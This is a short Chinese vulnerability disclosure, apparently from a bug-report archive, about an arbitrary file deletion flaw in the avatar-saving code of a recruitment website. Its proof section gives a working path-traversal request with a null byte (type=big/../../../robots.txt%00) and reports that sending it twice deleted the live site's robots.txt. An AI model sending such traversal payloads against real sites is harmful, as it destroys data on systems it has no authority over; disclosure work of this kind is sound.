### 简要描述:
只要有任意文件删除 这系统绝对崩。
我吐个槽,最新的过滤文件实在是太BT了,只要有select and .... 就die()
伤不起啊
### 详细说明:
问题出在 friend\model\index.class.php
[<img src="https://images.seebug.org/upload/201401/0119250873aadf723cab3eb6a38f52ad7625cdfa.jpg" alt=".." width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/0119250873aadf723cab3eb6a38f52ad7625cdfa.jpg)
[<img src="https://images.seebug.org/upload/201401/01192734913d89637618e20dc388128d83ee7a80.jpg" alt="asda.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/01192734913d89637618e20dc388128d83ee7a80.jpg)
### 漏洞证明:
1.注册个用户
2.访问 http://www.hr135.com/friend/index.php?C=save_avatar&task=save_avatar&type=big/../../../robots.txt%00&photoServer=http://www.hr135.comhttps://images.seebug.org/upload/friend/20140101/13887792315.JPG&from=icon&photoId=13887792315.JPG
访问2次,因为第一次 没有update到表里面 第二次查询出来 就删除了.
很抱歉 把robots.txt 删除了测试而已
京公网安备 11010502034610号
暂无评论